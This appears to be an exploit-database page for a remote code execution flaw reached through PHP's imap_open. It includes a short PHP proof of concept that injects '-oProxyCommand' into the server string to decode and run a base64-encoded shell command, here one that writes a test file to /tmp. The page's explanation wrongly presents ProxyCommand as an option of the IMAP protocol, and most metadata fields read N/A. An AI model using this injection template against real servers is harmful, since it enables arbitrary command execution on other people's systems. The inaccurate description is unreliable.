header-logo
Suggest Exploit
vendor:
N/A
by:
Antichat
9.8
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2020

Remote Code Execution Vulnerability in IMAP

This exploit allows an attacker to execute arbitrary code on a vulnerable server by using the IMAP protocol. The exploit uses the ProxyCommand option of the IMAP protocol to execute a base64 encoded command. The command is decoded and executed on the server.

Mitigation:

Disable IMAP protocol on the server or restrict access to the IMAP port.
Source

Exploit-DB raw data:

<?php
# https://antichat.com/threads/463395/#post-4254681
# echo '1234567890'>/tmp/test0001

$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";

imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());

Navigation

Suggest Exploit

Services By CQR